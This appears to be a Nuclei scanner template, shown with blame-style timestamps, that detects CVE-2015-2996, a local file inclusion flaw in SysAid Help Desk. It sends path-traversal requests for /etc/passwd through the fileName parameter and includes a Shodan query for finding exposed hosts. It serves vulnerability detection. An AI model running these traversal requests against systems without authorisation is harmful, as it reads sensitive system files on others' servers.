2022-09-27 21:42:24 +00:00
id : CVE-2015-2996
2023-02-07 04:30:16 +00:00
2022-09-27 21:42:24 +00:00
info :
2023-02-22 18:53:47 +00:00
name : SysAid Help Desk <15.2 - Local File Inclusion
2022-09-27 21:42:24 +00:00
author : 0x_Akoko
severity : high
2023-02-07 04:29:53 +00:00
description : |
2023-02-22 18:56:39 +00:00
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
2022-09-27 21:42:24 +00:00
reference :
- https://seclists.org/fulldisclosure/2015/Jun/8
2023-02-07 06:27:25 +00:00
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
2023-02-21 22:01:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
2022-09-27 21:42:24 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2015-2996
cwe-id : CWE-22
2023-02-07 04:29:53 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-02-07 06:06:01 +00:00
shodan-query : http.favicon.hash:1540720428
2023-02-07 06:27:25 +00:00
tags : cve,cve2015,sysaid,lfi,seclists
2022-09-27 21:42:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-27 21:42:24 +00:00
- method : GET
path :
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2023-02-07 04:29:53 +00:00
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2022-09-27 21:42:24 +00:00
2023-02-07 04:29:53 +00:00
stop-at-first-match : true
2022-09-27 21:42:24 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2023-02-21 21:57:50 +00:00
2023-02-22 18:53:47 +00:00
# Enhanced by md on 2023/02/22